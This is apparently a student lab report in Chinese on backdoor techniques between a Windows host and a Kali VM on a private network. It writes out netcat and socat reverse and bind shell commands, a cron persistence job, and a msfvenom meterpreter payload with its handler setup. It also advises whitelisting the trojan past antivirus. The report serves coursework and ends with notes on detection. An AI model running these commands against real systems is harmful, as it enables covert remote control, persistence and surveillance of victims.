20145232韩文浩《网络对抗》 后门原理与实践

实验内容

windows主机与kali虚拟机实现互联互通

在Windows下，先使用ipconfig指令查看本机IP：

192.168.31.129

在Linux下，先使用ifconfig指令查看本机IP：

192.168.31.132

windows开启监听端口：

kali发起连接请求:

使用netcat获取主机操作Shell，cron启动

Windows获得Linux的Shell

在windows上打开cmd，并通过ncat开放端口5232

在Kali环境下，使用nc指令的-e选项反向连接Windows主机的5232端口：

Windows下成功获得了一个Kali的shell，运行ls指令如下：

使用cron定时连接:crontab指令增加一条定时任务，-e表示编辑，接下来会进入编辑状态，在最后一行参照之前的格式加入一条自动执行netcat的指令即可

设定59分时自动开启，所以当主机时间到了59分时，就可以获取kali的shell了

Linux获得Windows的Shell

同上述操作，在linux下设置监听端口：nc -l -p 5232
在windows下请求连接：ncat 192.168.31.132 5232 -e cmd.exe
在linux下输入ipconfig查看主机IP：

使用socat获取主机操作Shell, 任务计划启动

在windows上开放5232端口，并把cmd的stderr重定向到stdout
socat tcp-listen:5232 exec:cmd,pty,stderr

在linux开启监听：socat - tcp:192.168.31.129:5232

使用MSF meterpreter生成可执行文件

通过meterpreter生成后门程序：20145232.exe
linux下输入指令：
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.132 LPORT=80 -f exe > 20145232.exe

接下来需要将这个后门程序传到我们的靶机上，可以通过ncat来实现
首先我在win的cmd下使用ncat.exe -lv 443 > 20145232.exe命令在443号端口进行监听
然后在Linux下使用ncat -nv 172.20.10.2 443 < 20145232.exe命令把文件传送过去

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

MSF打开监听进程
msfconsole：进入msf
use exploit/multi/handler：进入handler模式
set payload windows/meterpreter/reverse_tcp：设置payload
show options：查看当前信息状态
set LHOST 192.168.31.132：设置LHOST
set LPORT 80：设置LPORT
exploit：MSF开始监听

在windows下打开运行20145232.exe木马程序，此时杀毒软件可能会报毒，点击找回文件并添加到信任区即可，然后就可以在linux攻击机上取得靶机的shell了

通过screenshot进行屏幕截图

通过run metsvc为主机安装一些系统服务

问题回答

1、例举你能想到的一个后门进入到你系统中的可能方式？
下载一个非官方的应用，利用后门窃取用户隐私
2、例举你知道的后门如何启动起来(win及linux)的方式？
win下作为一个EXE通过用户点击，修改注册表，添加自启动项
Linux下可以通过crontab来定时启动
3、Meterpreter有哪些给你映像深刻的功能？
Meterpreter功能很强大，可以实现许多功能，提醒我们平时注意电脑安全隐患
4、如何发现自己有系统有没有被安装后门？
检查防火墙，使用安全杀毒软件，定期更新病毒库，定期杀毒。手动在开机自启动项中关闭可疑的程序